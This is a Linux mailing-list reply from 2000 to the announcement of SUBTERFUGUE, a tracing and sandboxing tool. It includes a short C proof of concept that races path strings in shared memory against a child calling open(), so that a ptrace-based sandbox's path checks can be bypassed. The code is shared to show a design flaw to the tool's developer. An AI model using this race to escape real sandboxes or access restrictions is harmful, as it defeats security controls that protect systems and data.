2000-02-07 17:12:03

by Pavel Machek

[permalink] [raw]
Subject: Re: [ANNOUNCE] SUBTERFUGUE 0.0

Hi!

> I'm pleased to announce the first public release of SUBTERFUGUE. Below is a
> brief description from the README.

I'll take a look (really, I'm doing something pretty close as my
diploma thesis). Meanwhile: take a look at this program. It is _very_
nasty, and I guess it is able to bypass your protection (Imagine you
want to restrict access to /heslo, but leave access to /reklama open.)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

void
main(void)
{
char *c = 0x94000000;
open( "/tmp/delme", O_RDWR );
mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, 3, 0 );
*c = 0;
if (fork()) {
while(1) {
strcpy( c, "/reklama" );
strcpy( c, "/heslo" );
}
} else
while (1)
open( c, 0 );
}

> SUBTERFUGUE is a framework for observing and playing with the reality of
> software; it's a foundation for building tools to do tracing, sandboxing, and
> many other things. You could think of it as "strace meets expect."

When I was faced with this task, I added ability to strace to ask if
it should do syscalls. Patch is rather small and attached. If there's
enough interest, I might even be able to push -y option into standart
distribution.

Pavel

--
I'm [email protected]. "In my country we have almost anarchy and I don't care."
Panos Katsaloulis describing me w.r.t. patents me at [email protected]


Attachments:
strace.main.diff#gz (1.95 kB)